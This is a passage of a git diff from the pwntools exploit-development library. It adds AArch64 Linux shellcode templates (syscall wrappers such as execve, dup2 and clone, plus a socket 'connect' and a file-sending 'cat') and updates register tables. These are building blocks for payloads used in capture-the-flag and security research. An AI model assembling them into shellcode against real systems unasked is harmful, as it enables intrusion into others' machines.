a/pwnlib/shellcraft/internal.py +++ b/pwnlib/shellcraft/internal.py @@ -161,10 +161,23 @@ def islabelchar(c): return %(funcname)s ''' % locals() - exec T + exec T in locals() # Setting _relpath is a slight hack only used to get better documentation res = wrap(template, render_global) res._relpath = path + res.__module__ = 'pwnlib.shellcraft.' + os.path.dirname(path).replace('/','.') + + import sys, inspect, functools + + @functools.wraps(res) + def function(*a): + return sys.modules[res.__module__].function(res.__name__, res, *a) + @functools.wraps(res) + def call(*a): + return sys.modules[res.__module__].call(res.__name__, *a) + + res.function = function + res.call = call return res diff --git a/pwnlib/shellcraft/registers.py b/pwnlib/shellcraft/registers.py index 54ba4dedf..1dca7b33e 100644 --- a/pwnlib/shellcraft/registers.py +++ b/pwnlib/shellcraft/registers.py @@ -3,18 +3,49 @@ from ..context import context from ..util.misc import register_sizes -mips = map('r{}'.format, range(32)) -mips += map('v{}'.format, range(2)) -mips += map('a{}'.format, range(4)) -mips += map('t{}'.format, range(8)) -mips += map('s{}'.format, range(9)) -mips += map('t{}'.format, range(8,10)) -mips += map('k{}'.format, range(2)) -mips += ['zero', 'at', 'gp', 'sp', 'ra'] +mips = { + '$0' : 0, '$zero': 0, + '$1' : 1, '$at': 1, + '$2' : 2, '$v0': 2, + '$3' : 3, '$v1': 3, + '$4' : 4, '$a0': 4, + '$5' : 5, '$a1': 5, + '$6' : 6, '$a2': 6, + '$7' : 7, '$a3': 7, + '$8' : 8, '$t0': 8, + '$9' : 9, '$t1': 9, + '$10': 10, '$t2': 10, + '$11': 11, '$t3': 11, + '$12': 12, '$t4': 12, + '$13': 13, '$t5': 13, + '$14': 14, '$t6': 14, + '$15': 15, '$t7': 15, + '$16': 16, '$s0': 16, + '$17': 17, '$s1': 17, + '$18': 18, '$s2': 18, + '$19': 19, '$s3': 19, + '$20': 20, '$s4': 20, + '$21': 21, '$s5': 21, + '$22': 22, '$s6': 22, + '$23': 23, '$s7': 23, + '$24': 24, '$t8': 24, + '$25': 25, '$t9': 25, + '$26': 26, '$k0': 26, + '$27': 27, '$k1': 27, + '$28': 28, '$gp': 28, + '$29': 29, '$sp': 29, + '$30': 30, '$s8': 30, + '$31': 31, '$ra': 31, +} arm = map('r{}'.format, range(13)) arm += ["sp", "lr", "pc", "cpsr"] +thumb = arm + +aarch64 = map('x{}'.format, range(32)) +aarch64 += ["sp", "lr", "pc", "cpsr"] + i386_baseregs = [ "ax", "cx", "dx", "bx", "sp", "bp", "si", "di", "ip"] i386 = map('e{}'.format, i386_baseregs) @@ -22,8 +53,8 @@ i386 += [ "eflags", "cs", "ss", "ds", "es", "fs", "gs", ] amd64 = map('r{}'.format, i386_baseregs) -amd64 += map('r{}'.format, range(10,16)) -amd64 += map('r{}d'.format, range(10,16)) +amd64 += map('r{}'.format, range(8,16)) +amd64 += map('r{}d'.format, range(8,16)) amd64 += i386 powerpc = map('r{}'.format, range(32)) @@ -124,6 +155,14 @@ def __init__(self, name, size): if name.startswith('r') or name[1:3].isdigit(): self.is64bit = True + @property + def bits(self): + return self.size + + @property + def bytes(self): + return self.bits / 8 + def fits(self, value): return self.size >= bits_required(value) @@ -142,7 +181,9 @@ def __repr__(self): def get_register(name): if isinstance(name, Register): return name - return intel.get(name, None) + if isinstance(name, str): + return intel.get(name, None) + return None def is_register(obj): if isinstance(obj, Register): diff --git a/pwnlib/shellcraft/templates/aarch64/__doc__ b/pwnlib/shellcraft/templates/aarch64/__doc__ new file mode 100644 index 000000000..e69de29bb diff --git a/pwnlib/shellcraft/templates/aarch64/infloop.asm b/pwnlib/shellcraft/templates/aarch64/infloop.asm new file mode 100644 index 000000000..77aab644a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/infloop.asm @@ -0,0 +1,5 @@ +<% from pwnlib.shellcraft import common %> +<%docstring>An infinite loop. +<% infloop = common.label("infloop") %> +${infloop}: + b ${infloop} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/__doc__ b/pwnlib/shellcraft/templates/aarch64/linux/__doc__ new file mode 100644 index 000000000..e69de29bb diff --git a/pwnlib/shellcraft/templates/aarch64/linux/accept.asm b/pwnlib/shellcraft/templates/aarch64/linux/accept.asm new file mode 100644 index 000000000..595920998 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/accept.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, addr, addr_len"/> +<%docstring> +Invokes the syscall accept. See 'man 2 accept' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_accept', fd, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/access.asm b/pwnlib/shellcraft/templates/aarch64/linux/access.asm new file mode 100644 index 000000000..5e4d2db87 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/access.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="name, type"/> +<%docstring> +Invokes the syscall access. See 'man 2 access' for more information. + +Arguments: + name(char): name + type(int): type + + + ${syscall('SYS_access', name, type)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/acct.asm b/pwnlib/shellcraft/templates/aarch64/linux/acct.asm new file mode 100644 index 000000000..0524faba6 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/acct.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall acct. See 'man 2 acct' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_acct', name)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/alarm.asm b/pwnlib/shellcraft/templates/aarch64/linux/alarm.asm new file mode 100644 index 000000000..81a2a7e26 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/alarm.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="seconds"/> +<%docstring> +Invokes the syscall alarm. See 'man 2 alarm' for more information. + +Arguments: + seconds(unsigned): seconds + + + ${syscall('SYS_alarm', seconds)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/bind.asm b/pwnlib/shellcraft/templates/aarch64/linux/bind.asm new file mode 100644 index 000000000..3361b3db2 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/bind.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall bind. See 'man 2 bind' for more information. + +Arguments: + fd(int): fd + addr(CONST_SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_bind', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/brk.asm b/pwnlib/shellcraft/templates/aarch64/linux/brk.asm new file mode 100644 index 000000000..74296208f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/brk.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="addr"/> +<%docstring> +Invokes the syscall brk. See 'man 2 brk' for more information. + +Arguments: + addr(void): addr + + + ${syscall('SYS_brk', addr)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/cat.asm b/pwnlib/shellcraft/templates/aarch64/linux/cat.asm new file mode 100644 index 000000000..3b2f5d0b7 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/cat.asm @@ -0,0 +1,18 @@ +<% + from pwnlib.shellcraft.aarch64 import syscall, pushstr + from pwnlib.shellcraft import common +%> +<%page args="filename, fd=1"/> +<%docstring> +Opens a file and writes its contents to the specified file descriptor. + +Example: + + >>> write('flag', 'This is the flag\n') + >>> run_assembly(shellcraft.cat('flag')).recvline() + 'This is the flag\n' + + + ${pushstr(filename)} + ${syscall('SYS_open', 'sp', 0, 'O_RDONLY')} + ${syscall('SYS_sendfile', fd, 'x0', 0, 0x7fffffff)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/chdir.asm b/pwnlib/shellcraft/templates/aarch64/linux/chdir.asm new file mode 100644 index 000000000..ae942daac --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/chdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chdir. See 'man 2 chdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chdir', path)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/chmod.asm b/pwnlib/shellcraft/templates/aarch64/linux/chmod.asm new file mode 100644 index 000000000..136a0a602 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/chmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall chmod. See 'man 2 chmod' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_chmod', file, mode)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/chown.asm b/pwnlib/shellcraft/templates/aarch64/linux/chown.asm new file mode 100644 index 000000000..f0d4efb37 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/chown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall chown. See 'man 2 chown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_chown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/chroot.asm b/pwnlib/shellcraft/templates/aarch64/linux/chroot.asm new file mode 100644 index 000000000..2ac96621d --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/chroot.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chroot. See 'man 2 chroot' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chroot', path)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/clock_getres.asm b/pwnlib/shellcraft/templates/aarch64/linux/clock_getres.asm new file mode 100644 index 000000000..c5146b204 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/clock_getres.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="clock_id, res"/> +<%docstring> +Invokes the syscall clock_getres. See 'man 2 clock_getres' for more information. + +Arguments: + clock_id(clockid_t): clock_id + res(timespec): res + + + ${syscall('SYS_clock_getres', clock_id, res)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/clock_gettime.asm b/pwnlib/shellcraft/templates/aarch64/linux/clock_gettime.asm new file mode 100644 index 000000000..ea3d37edc --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/clock_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_gettime. See 'man 2 clock_gettime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_gettime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/clock_nanosleep.asm b/pwnlib/shellcraft/templates/aarch64/linux/clock_nanosleep.asm new file mode 100644 index 000000000..b67ab9dad --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/clock_nanosleep.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="clock_id, flags, req, rem"/> +<%docstring> +Invokes the syscall clock_nanosleep. See 'man 2 clock_nanosleep' for more information. + +Arguments: + clock_id(clockid_t): clock_id + flags(int): flags + req(timespec): req + rem(timespec): rem + + + ${syscall('SYS_clock_nanosleep', clock_id, flags, req, rem)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/clock_settime.asm b/pwnlib/shellcraft/templates/aarch64/linux/clock_settime.asm new file mode 100644 index 000000000..3d2e48d34 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/clock_settime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_settime. See 'man 2 clock_settime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_settime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/clone.asm b/pwnlib/shellcraft/templates/aarch64/linux/clone.asm new file mode 100644 index 000000000..496e12bad --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/clone.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fn, child_stack, flags, arg, vararg"/> +<%docstring> +Invokes the syscall clone. See 'man 2 clone' for more information. + +Arguments: + fn(int): fn + child_stack(void): child_stack + flags(int): flags + arg(void): arg + vararg(int): vararg + + + ${syscall('SYS_clone', fn, child_stack, flags, arg, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/close.asm b/pwnlib/shellcraft/templates/aarch64/linux/close.asm new file mode 100644 index 000000000..df9daec69 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/close.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall close. See 'man 2 close' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_close', fd)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/connect.asm b/pwnlib/shellcraft/templates/aarch64/linux/connect.asm new file mode 100644 index 000000000..4f47bd03e --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/connect.asm @@ -0,0 +1,26 @@ +<% +from pwnlib.shellcraft.aarch64 import pushstr +from pwnlib.shellcraft.aarch64.linux import socket, syscall +from pwnlib.util.net import sockaddr +%> + +<%page args="host, port, network = 'ipv4'"/> +<%docstring> + Connects to the host on the specified port. + Network is either 'ipv4' or 'ipv6'. + Leaves the connected socket in x12. + +<% + sockaddr, addr_len, address_family = sockaddr(host, port, network) +%>\ + /* open new socket */ + ${socket(network)} + + /* Put socket into x12 */ + mov x12, x0 + + /* Create address structure on stack */ + ${pushstr(sockaddr, False)} + + /* Connect the socket */ + ${syscall('SYS_connect', 'x12', 'sp', addr_len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/creat.asm b/pwnlib/shellcraft/templates/aarch64/linux/creat.asm new file mode 100644 index 000000000..9c76a9e1f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/creat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall creat. See 'man 2 creat' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_creat', file, mode)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/dup.asm b/pwnlib/shellcraft/templates/aarch64/linux/dup.asm new file mode 100644 index 000000000..27a8d6c76 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/dup.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall dup. See 'man 2 dup' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_dup', fd)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/dup2.asm b/pwnlib/shellcraft/templates/aarch64/linux/dup2.asm new file mode 100644 index 000000000..1cbf70376 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/dup2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, fd2"/> +<%docstring> +Invokes the syscall dup2. See 'man 2 dup2' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + + + ${syscall('SYS_dup2', fd, fd2)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/dup3.asm b/pwnlib/shellcraft/templates/aarch64/linux/dup3.asm new file mode 100644 index 000000000..4b75cebf4 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/dup3.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, fd2, flags"/> +<%docstring> +Invokes the syscall dup3. See 'man 2 dup3' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + flags(int): flags + + + ${syscall('SYS_dup3', fd, fd2, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/echo.asm b/pwnlib/shellcraft/templates/aarch64/linux/echo.asm new file mode 100644 index 000000000..8134eff6e --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/echo.asm @@ -0,0 +1,14 @@ +<% from pwnlib.shellcraft import aarch64 %> +<%page args="string, sock = '1'"/> +<%docstring> +Writes a string to a file descriptor + +Example: + + >>> run_assembly(shellcraft.echo('hello\n', 1)).recvline() + 'hello\n' + + + +${aarch64.pushstr(string, append_null = False)} +${aarch64.linux.write(sock, 'sp', len(string))} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/epoll_create.asm b/pwnlib/shellcraft/templates/aarch64/linux/epoll_create.asm new file mode 100644 index 000000000..37d6c065b --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/epoll_create.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="size"/> +<%docstring> +Invokes the syscall epoll_create. See 'man 2 epoll_create' for more information. + +Arguments: + size(int): size + + + ${syscall('SYS_epoll_create', size)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/epoll_create1.asm b/pwnlib/shellcraft/templates/aarch64/linux/epoll_create1.asm new file mode 100644 index 000000000..0ae24df5d --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/epoll_create1.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall epoll_create1. See 'man 2 epoll_create1' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_epoll_create1', flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/epoll_ctl.asm b/pwnlib/shellcraft/templates/aarch64/linux/epoll_ctl.asm new file mode 100644 index 000000000..08d334005 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/epoll_ctl.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="epfd, op, fd, event"/> +<%docstring> +Invokes the syscall epoll_ctl. See 'man 2 epoll_ctl' for more information. + +Arguments: + epfd(int): epfd + op(int): op + fd(int): fd + event(epoll_event): event + + + ${syscall('SYS_epoll_ctl', epfd, op, fd, event)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/epoll_pwait.asm b/pwnlib/shellcraft/templates/aarch64/linux/epoll_pwait.asm new file mode 100644 index 000000000..aebff74a2 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/epoll_pwait.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout, ss"/> +<%docstring> +Invokes the syscall epoll_pwait. See 'man 2 epoll_pwait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + ss(sigset_t): ss + + + ${syscall('SYS_epoll_pwait', epfd, events, maxevents, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/epoll_wait.asm b/pwnlib/shellcraft/templates/aarch64/linux/epoll_wait.asm new file mode 100644 index 000000000..e744a762a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/epoll_wait.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout"/> +<%docstring> +Invokes the syscall epoll_wait. See 'man 2 epoll_wait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + + + ${syscall('SYS_epoll_wait', epfd, events, maxevents, timeout)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/execve.asm b/pwnlib/shellcraft/templates/aarch64/linux/execve.asm new file mode 100644 index 000000000..b40262fdc --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/execve.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="path, argv, envp"/> +<%docstring> +Invokes the syscall execve. See 'man 2 execve' for more information. + +Arguments: + path(char): path + argv(char): argv + envp(char): envp + + + ${syscall('SYS_execve', path, argv, envp)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/exit.asm b/pwnlib/shellcraft/templates/aarch64/linux/exit.asm new file mode 100644 index 000000000..72e870c22 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/exit.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="status"/> +<%docstring> +Invokes the syscall exit. See 'man 2 exit' for more information. + +Arguments: + status(int): status + + + ${syscall('SYS_exit', status)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/faccessat.asm b/pwnlib/shellcraft/templates/aarch64/linux/faccessat.asm new file mode 100644 index 000000000..0951f75f7 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/faccessat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, file, type, flag"/> +<%docstring> +Invokes the syscall faccessat. See 'man 2 faccessat' for more information. + +Arguments: + fd(int): fd + file(char): file + type(int): type + flag(int): flag + + + ${syscall('SYS_faccessat', fd, file, type, flag)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fallocate.asm b/pwnlib/shellcraft/templates/aarch64/linux/fallocate.asm new file mode 100644 index 000000000..61d00b19c --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fallocate.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, mode, offset, len"/> +<%docstring> +Invokes the syscall fallocate. See 'man 2 fallocate' for more information. + +Arguments: + fd(int): fd + mode(int): mode + offset(off_t): offset + len(off_t): len + + + ${syscall('SYS_fallocate', fd, mode, offset, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fchdir.asm b/pwnlib/shellcraft/templates/aarch64/linux/fchdir.asm new file mode 100644 index 000000000..53481c54e --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fchdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fchdir. See 'man 2 fchdir' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fchdir', fd)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fchmod.asm b/pwnlib/shellcraft/templates/aarch64/linux/fchmod.asm new file mode 100644 index 000000000..f51b5364d --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fchmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, mode"/> +<%docstring> +Invokes the syscall fchmod. See 'man 2 fchmod' for more information. + +Arguments: + fd(int): fd + mode(mode_t): mode + + + ${syscall('SYS_fchmod', fd, mode)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fchmodat.asm b/pwnlib/shellcraft/templates/aarch64/linux/fchmodat.asm new file mode 100644 index 000000000..569a076e4 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fchmodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, file, mode, flag"/> +<%docstring> +Invokes the syscall fchmodat. See 'man 2 fchmodat' for more information. + +Arguments: + fd(int): fd + file(char): file + mode(mode_t): mode + flag(int): flag + + + ${syscall('SYS_fchmodat', fd, file, mode, flag)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fchown.asm b/pwnlib/shellcraft/templates/aarch64/linux/fchown.asm new file mode 100644 index 000000000..56259c4bc --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, owner, group"/> +<%docstring> +Invokes the syscall fchown. See 'man 2 fchown' for more information. + +Arguments: + fd(int): fd + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_fchown', fd, owner, group)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fchownat.asm b/pwnlib/shellcraft/templates/aarch64/linux/fchownat.asm new file mode 100644 index 000000000..199a9ed87 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fchownat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, file, owner, group, flag"/> +<%docstring> +Invokes the syscall fchownat. See 'man 2 fchownat' for more information. + +Arguments: + fd(int): fd + file(char): file + owner(uid_t): owner + group(gid_t): group + flag(int): flag + + + ${syscall('SYS_fchownat', fd, file, owner, group, flag)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fcntl.asm b/pwnlib/shellcraft/templates/aarch64/linux/fcntl.asm new file mode 100644 index 000000000..759176121 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fcntl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, cmd, vararg"/> +<%docstring> +Invokes the syscall fcntl. See 'man 2 fcntl' for more information. + +Arguments: + fd(int): fd + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_fcntl', fd, cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fdatasync.asm b/pwnlib/shellcraft/templates/aarch64/linux/fdatasync.asm new file mode 100644 index 000000000..dfa0d2b50 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fdatasync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fildes"/> +<%docstring> +Invokes the syscall fdatasync. See 'man 2 fdatasync' for more information. + +Arguments: + fildes(int): fildes + + + ${syscall('SYS_fdatasync', fildes)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/flock.asm b/pwnlib/shellcraft/templates/aarch64/linux/flock.asm new file mode 100644 index 000000000..55125650d --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/flock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, operation"/> +<%docstring> +Invokes the syscall flock. See 'man 2 flock' for more information. + +Arguments: + fd(int): fd + operation(int): operation + + + ${syscall('SYS_flock', fd, operation)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fork.asm b/pwnlib/shellcraft/templates/aarch64/linux/fork.asm new file mode 100644 index 000000000..b005c5e32 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall fork. See 'man 2 fork' for more information. + +Arguments: + + + + ${syscall('SYS_fork')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/forkexit.asm b/pwnlib/shellcraft/templates/aarch64/linux/forkexit.asm new file mode 100644 index 000000000..3746a77d2 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/forkexit.asm @@ -0,0 +1,16 @@ +<% + from pwnlib.shellcraft import common + from pwnlib.shellcraft.aarch64.linux import fork, exit +%> +<%page args=""/> +<%docstring> +Attempts to fork. If the fork is successful, the parent exits. + +<% +dont_exit = common.label('forkexit') +%> + ${fork()} + cmp x0, 1 + blt ${dont_exit} + ${exit(0)} +${dont_exit}: diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fstat.asm b/pwnlib/shellcraft/templates/aarch64/linux/fstat.asm new file mode 100644 index 000000000..1d1200b5d --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat. See 'man 2 fstat' for more information. + +Arguments: + fd(int): fd + buf(stat): buf + + + ${syscall('SYS_fstat', fd, buf)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fstat64.asm b/pwnlib/shellcraft/templates/aarch64/linux/fstat64.asm new file mode 100644 index 000000000..38849140a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat64. See 'man 2 fstat64' for more information. + +Arguments: + fd(int): fd + buf(stat64): buf + + + ${syscall('SYS_fstat64', fd, buf)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fstatat64.asm b/pwnlib/shellcraft/templates/aarch64/linux/fstatat64.asm new file mode 100644 index 000000000..f633516f9 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fstatat64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, file, buf, flag"/> +<%docstring> +Invokes the syscall 